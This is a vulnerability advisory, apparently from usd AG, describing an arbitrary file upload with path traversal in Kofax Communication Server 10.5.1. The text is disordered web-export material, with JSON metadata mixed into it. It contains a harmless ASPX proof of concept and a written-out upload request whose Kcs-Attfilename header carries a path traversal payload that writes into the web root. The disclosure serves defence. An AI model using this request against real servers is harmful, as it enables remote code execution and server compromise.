Affected Version<\/strong>: 10.5.1
Vulnerability Type<\/strong>: Unrestricted Upload of File with Dangerous Type (CWE-434)
Security Risk<\/strong>: Critical
Vendor<\/strong>: Tungsten Automation
Vendor URL<\/strong>: https:\/\/www.tungstenautomation.de\/<\/a>
Vendor acknowledged vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE Number<\/strong>: Requested
CVE Link<\/strong>: Not requested yet
Advisory ID<\/strong>: usd-2025-67<\/p>\n
Description<\/h3>\n
Kofax Communication Server (KCS)<\/em>, formerly known as TOPCALL<\/em> is used as a message broker, mainly for TELEX messages (aerospace-specific messages that, for example, inform about airplane movements). Other message types, such as AFTN, ASCARS, SMS and FAX are supported, too.<\/p>\n The web application KCS Portal<\/em> allows configuration of allowed recipients and senders, viewing transmitted messages, monitoring functionality, user management, and composing messages.<\/p>\n The functionality for uploading message attachments in the KCS Portal<\/em> accepts uploads of arbitrary file formats and is vulnerable to path traversal attacks.<\/p>\n The request to upload the file sets the file name via the Kcs-Attfilename<\/strong> header. The value of this header is not filtered and allows path traversal payloads (..\/<\/strong>). In addition, the application does not restrict or filter uploaded files to deny executable files or potentially dangerous attachments.<\/p>\n This allows an attacker to upload executable files to arbitrary locations on the application server, including the web root. The following harmless proof of concept executes two commands to read the current server time and machine name and prints them to the website:<\/p>\n Using the following path traversal payload in the Kcs-Attfilename<\/strong> header stores the .aspx<\/strong> file to the web root at *C:\\TCOSS\\KCSPORTAL\\Web*<\/em>:<\/p>\n Accessing the file in the browser leads to the code being executed. This can be seen in the screenshot below, since the current server time and machine name are displayed:<\/p>\n Uploaded files should be filtered regarding their file extension and checked for their Magic Bytes<\/em> before they are accepted by the application server. This security vulnerability was identified by Dominique Dittert, Roman Hergenreder & Samuel Stein of usd AG.<\/p>\n [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":" usd-2025-67 | Kofax Communication Server 10.5.1 - Arbitrary File Upload Product: Kofax Communication ServerAffected Version: 10.5.1Vulnerability Type: Unrestricted Upload of File with Dangerous Type (CWE-434)Security Risk: CriticalVendor: Tungsten AutomationVendor URL: https:\/\/www.tungstenautomation.de\/Vendor acknowledged vulnerability: YesVendor Status: FixedCVE Number: RequestedCVE Link: Not requested yetAdvisory ID: usd-2025-67 Description Kofax Communication Server (KCS), formerly known as TOPCALL is used […]<\/p>\n","protected":false},"author":114,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-24958","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24958","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/114"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=24958"}],"version-history":[{"count":3,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24958\/revisions"}],"predecessor-version":[{"id":24961,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24958\/revisions\/24961"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=24958"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
Accessing the uploaded files using a browser leads to execution of the uploaded code, and potential full system compromise.<\/p>\nProof of Concept<\/h3>\n
<%@ Page Language=\"C#\" %><!DOCTYPE html><html><head> <title>Pentest Proof<\/title><\/head><body> <h1>Pentest usd 2025<\/h1> <p>Server time: <%= DateTime.Now %><\/p> <p>Machine name: <%= Environment.MachineName %><\/p><\/body><\/html><\/pre>\n
POST \/kcsportal\/api\/v1\/msgservers\/[redacted]\/messages\/5c0b7cf9-7c02-448c-b21e-f424a2bd0c8e\/attupload HTTP\/1.1Host: [redacted]Cookie: [redacted]Kcs-Connectionhandle: 1729603561467150336Kcs-Attfilename: \/..\/..\/..\/..\/..\/..\/..\/..\/TCOSS\/KCSPORTAL\/Web\/pentest-usd-2025-[...].aspx[...]data:application\/octet-stream;base64,PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiAlPgo8IURPQ1RZUEUgaHRtbD4KPGh0bWw+CjxoZWFkPgogICAgPHRpdGxlPlBlbnRlc3QgUHJvb2Y8L3RpdGxlPgo8L2hlYWQ+Cjxib2R5PgogICAgPGgxPlBlbnRlc3QgdXNkIDIwMjU8L2gxPgogICAgPHA+U2VydmVyIHRpbWU6IDwlPSBEYXRlVGltZS5Ob3cgJT48L3A+CiAgICA8cD5NYWNoaW5lIG5hbWU6IDwlPSBFbnZpcm9ubWVudC5NYWNoaW5lTmFtZSAlPjwvcD4KPC9ib2R5Pgo8L2h0bWw+Cg==<\/pre>\n
![\"\"](\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/02\/code-execution.png\")
<\/p>\nFix<\/h3>\n
This filtering should be implemented based on an allowlist that only contains required and trusted file types.
Furthermore, it is recommended to filter all input that is used in the context of file operations for path specifications.
Ideally, the file system of the application should be isolated, e.g. using sandboxing<\/em>.<\/p>\nReferences<\/h3>\n
\n
Timeline<\/h3>\n
\n
Credits<\/h3>\n